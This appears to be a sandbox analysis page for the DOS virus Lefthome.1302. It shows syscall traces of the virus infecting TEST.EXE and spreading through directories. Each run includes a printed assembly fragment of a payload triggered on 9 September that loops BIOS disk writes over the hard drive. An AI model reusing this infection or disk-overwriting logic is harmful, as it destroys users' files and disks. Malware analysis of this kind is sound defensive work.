Sample viewer

vx.netlux.org/Virus.DOS.Lefthome.1302

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:27:28.047779744Z 25 PC: 12b89 | Get default drive
2018-12-17T22:27:28.049212836Z 71 PC: 12b9c | Get current directory
2018-12-17T22:27:28.052923062Z 26 PC: 12ba4 | Set disk transfer address
2018-12-17T22:27:28.054552078Z 78 PC: 12bd8 | Find first file
2018-12-17T22:27:28.061771393Z 61 PC: 12bf8 | Open file (Filename = 'TEST.EXE')
2018-12-17T22:27:28.070876807Z 63 PC: 12c07 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:27:28.074122716Z 62 PC: 12c0b | Close file
2018-12-17T22:27:28.078020342Z 67 PC: 12c29 | Get or set file attributes
2018-12-17T22:27:28.114555239Z 61 PC: 12c37 | Open file (Filename = 'TEST.EXE')
2018-12-17T22:27:28.122412939Z 63 PC: 12c47 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T22:27:28.125391095Z 66 PC: 12c77 | Move file pointer
2018-12-17T22:27:28.127513818Z 64 PC: 12c82 | Write file or device (Write 257 bytes on handle 5)
2018-12-17T22:27:28.136583765Z 64 PC: 12c8e | Write file or device (Write 356 bytes on handle 5)
2018-12-17T22:27:28.145414215Z 64 PC: 12c9a | Write file or device (Write 689 bytes on handle 5)
2018-12-17T22:27:28.155419132Z 66 PC: 12ce3 | Move file pointer
2018-12-17T22:27:28.157340587Z 66 PC: 12cfb | Move file pointer
2018-12-17T22:27:28.158735844Z 64 PC: 12d06 | Write file or device (Write 28 bytes on handle 5)
2018-12-17T22:27:28.161703449Z 87 PC: 12d1c | Get or set file date and time
2018-12-17T22:27:28.164576133Z 62 PC: 12d20 | Close file
2018-12-17T22:27:28.173944334Z 67 PC: 12d30 | Get or set file attributes
2018-12-17T22:27:28.185170614Z 59 PC: 12e0b | Change current directory
2018-12-17T22:27:28.191903441Z 78 PC: 12bd8 | Find first file
2018-12-17T22:27:28.199211606Z 79 PC: 12be0 | Find next file
2018-12-17T22:27:28.202160559Z 59 PC: 12e0b | Change current directory
2018-12-17T22:27:28.208049872Z 78 PC: 12bd8 | Find first file
2018-12-17T22:27:28.220385548Z 79 PC: 12be0 | Find next file
2018-12-17T22:27:28.223071573Z 59 PC: 12e0b | Change current directory
2018-12-17T22:27:28.225368788Z 78 PC: 12bd8 | Find first file
2018-12-17T22:27:28.239510223Z 79 PC: 12be0 | Find next file
2018-12-17T22:27:28.24257279Z 59 PC: 12e0b | Change current directory
2018-12-17T22:27:28.245473486Z 78 PC: 12bd8 | Find first file
2018-12-17T22:27:28.253489958Z 79 PC: 12be0 | Find next file
2018-12-17T22:27:28.256238434Z 42 PC: 12d85 | Get date 0x12d85: cmp dx, 0x909
0x12d89: jne 0x12e06
0x12d8b: mov ah, 8
0x12d8d: int 0x13
0x12d8f: xchg dl, dh
0x12d91: xor dh, dh
0x12d93: mov si, dx
0x12d95: mov dh, 0
0x12d97: mov dl, 0x80
0x12d99: mov cx, 1
0x12d9c: cli
0x12d9d: mov ax, 0x30f
0x12da0: int 0x13
0x12da2: inc dh
0x12da4: inc ch
0x12da6: dec si
0x12da7: jne 0x12d9c
0x12da9: mov ax, 0xd
0x12dac: int 0x10
0x12dae: mov ah, 0xe
2018-12-17T22:27:28.258897448Z 59 PC: 12d64 | Change current directory
2018-12-17T22:27:28.263930054Z 26 PC: 12d74 | Set disk transfer address
2018-12-17T22:27:28.265368278Z 9 PC: 12ac8 | Display string (Could not find end pointer)
2018-12-17T22:27:28.282548585Z 76 PC: 12acc | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":9,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4886,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:11.056139125Z 25 PC: 12b89 | Get default drive
2018-12-25T11:53:11.058187037Z 71 PC: 12b9c | Get current directory
2018-12-25T11:53:11.061247675Z 26 PC: 12ba4 | Set disk transfer address
2018-12-25T11:53:11.062781723Z 78 PC: 12bd8 | Find first file
2018-12-25T11:53:11.068982128Z 61 PC: 12bf8 | Open file (Filename = 'TEST.EXE')
2018-12-25T11:53:11.076229845Z 63 PC: 12c07 | Read file or device (Read 2 bytes on handle 5)
2018-12-25T11:53:11.078450174Z 62 PC: 12c0b | Close file
2018-12-25T11:53:11.080202971Z 67 PC: 12c29 | Get or set file attributes
2018-12-25T11:53:11.095051108Z 61 PC: 12c37 | Open file (Filename = 'TEST.EXE')
2018-12-25T11:53:11.106890288Z 63 PC: 12c47 | Read file or device (Read 28 bytes on handle 5)
2018-12-25T11:53:11.116758457Z 66 PC: 12c77 | Move file pointer
2018-12-25T11:53:11.118535849Z 64 PC: 12c82 | Write file or device (Write 257 bytes on handle 5)
2018-12-25T11:53:11.125798445Z 64 PC: 12c8e | Write file or device (Write 356 bytes on handle 5)
2018-12-25T11:53:11.131161158Z 64 PC: 12c9a | Write file or device (Write 689 bytes on handle 5)
2018-12-25T11:53:11.14091544Z 66 PC: 12ce3 | Move file pointer
2018-12-25T11:53:11.148698236Z 66 PC: 12cfb | Move file pointer
2018-12-25T11:53:11.150124748Z 64 PC: 12d06 | Write file or device (Write 28 bytes on handle 5)
2018-12-25T11:53:11.153526585Z 87 PC: 12d1c | Get or set file date and time
2018-12-25T11:53:11.16283224Z 62 PC: 12d20 | Close file
2018-12-25T11:53:11.170552465Z 67 PC: 12d30 | Get or set file attributes
2018-12-25T11:53:11.17800797Z 59 PC: 12e0b | Change current directory
2018-12-25T11:53:11.181238297Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.185007572Z 79 PC: 12be0 | Find next file
2018-12-25T11:53:11.187366598Z 59 PC: 12e0b | Change current directory (See above)
2018-12-25T11:53:11.191499406Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.19704085Z 79 PC: 12be0 | Find next file (See above)
2018-12-25T11:53:11.199303946Z 59 PC: 12e0b | Change current directory (See above)
2018-12-25T11:53:11.201191734Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.20692192Z 79 PC: 12be0 | Find next file (See above)
2018-12-25T11:53:11.208467932Z 59 PC: 12e0b | Change current directory (See above)
2018-12-25T11:53:11.209968917Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.213611054Z 79 PC: 12be0 | Find next file (See above)
2018-12-25T11:53:11.215151074Z 42 PC: 12d85 | Get date 0x12d85: cmp dx, 0x909
0x12d89: jne 0x12e06
0x12d8b: mov ah, 8
0x12d8d: int 0x13
0x12d8f: xchg dl, dh
0x12d91: xor dh, dh
0x12d93: mov si, dx
0x12d95: mov dh, 0
0x12d97: mov dl, 0x80
0x12d99: mov cx, 1
0x12d9c: cli
0x12d9d: mov ax, 0x30f
0x12da0: int 0x13
0x12da2: inc dh
0x12da4: inc ch
0x12da6: dec si
0x12da7: jne 0x12d9c
0x12da9: mov ax, 0xd
0x12dac: int 0x10
0x12dae: mov ah, 0xe

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4886,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:11.249677934Z 25 PC: 12b89 | Get default drive
2018-12-25T11:53:11.251896151Z 71 PC: 12b9c | Get current directory
2018-12-25T11:53:11.255184123Z 26 PC: 12ba4 | Set disk transfer address
2018-12-25T11:53:11.256938206Z 78 PC: 12bd8 | Find first file
2018-12-25T11:53:11.265018052Z 61 PC: 12bf8 | Open file (Filename = 'TEST.EXE')
2018-12-25T11:53:11.27327666Z 63 PC: 12c07 | Read file or device (Read 2 bytes on handle 5)
2018-12-25T11:53:11.276266297Z 62 PC: 12c0b | Close file
2018-12-25T11:53:11.278382104Z 67 PC: 12c29 | Get or set file attributes
2018-12-25T11:53:11.570197897Z 61 PC: 12c37 | Open file (Filename = 'TEST.EXE')
2018-12-25T11:53:11.577949774Z 63 PC: 12c47 | Read file or device (Read 28 bytes on handle 5)
2018-12-25T11:53:11.581295044Z 66 PC: 12c77 | Move file pointer
2018-12-25T11:53:11.584404885Z 64 PC: 12c82 | Write file or device (Write 257 bytes on handle 5)
2018-12-25T11:53:11.593382975Z 64 PC: 12c8e | Write file or device (Write 356 bytes on handle 5)
2018-12-25T11:53:11.602012136Z 64 PC: 12c9a | Write file or device (Write 689 bytes on handle 5)
2018-12-25T11:53:11.612004671Z 66 PC: 12ce3 | Move file pointer
2018-12-25T11:53:11.613707136Z 66 PC: 12cfb | Move file pointer
2018-12-25T11:53:11.615268483Z 64 PC: 12d06 | Write file or device (Write 28 bytes on handle 5)
2018-12-25T11:53:11.618618992Z 87 PC: 12d1c | Get or set file date and time
2018-12-25T11:53:11.620922129Z 62 PC: 12d20 | Close file
2018-12-25T11:53:11.633083041Z 67 PC: 12d30 | Get or set file attributes
2018-12-25T11:53:11.644937946Z 59 PC: 12e0b | Change current directory
2018-12-25T11:53:11.654053717Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.66057314Z 79 PC: 12be0 | Find next file
2018-12-25T11:53:11.663037028Z 59 PC: 12e0b | Change current directory (See above)
2018-12-25T11:53:11.68278375Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.698964205Z 79 PC: 12be0 | Find next file (See above)
2018-12-25T11:53:11.70142269Z 59 PC: 12e0b | Change current directory (See above)
2018-12-25T11:53:11.704577215Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.711081423Z 79 PC: 12be0 | Find next file (See above)
2018-12-25T11:53:11.714559765Z 59 PC: 12e0b | Change current directory (See above)
2018-12-25T11:53:11.721899174Z 78 PC: 12bd8 | Find first file (See above)
2018-12-25T11:53:11.728735758Z 79 PC: 12be0 | Find next file (See above)
2018-12-25T11:53:11.73145679Z 42 PC: 12d85 | Get date 0x12d85: cmp dx, 0x909
0x12d89: jne 0x12e06
0x12d8b: mov ah, 8
0x12d8d: int 0x13
0x12d8f: xchg dl, dh
0x12d91: xor dh, dh
0x12d93: mov si, dx
0x12d95: mov dh, 0
0x12d97: mov dl, 0x80
0x12d99: mov cx, 1
0x12d9c: cli
0x12d9d: mov ax, 0x30f
0x12da0: int 0x13
0x12da2: inc dh
0x12da4: inc ch
0x12da6: dec si
0x12da7: jne 0x12d9c
0x12da9: mov ax, 0xd
0x12dac: int 0x10
0x12dae: mov ah, 0xe
2018-12-25T11:53:11.734962477Z 59 PC: 12d64 | Change current directory
2018-12-25T11:53:11.740188445Z 26 PC: 12d74 | Set disk transfer address
2018-12-25T11:53:11.74192432Z 9 PC: 12ac8 | Display string (Could not find end pointer)
2018-12-25T11:53:11.759078165Z 76 PC: 12acc | Terminate with return code (Return code = '36')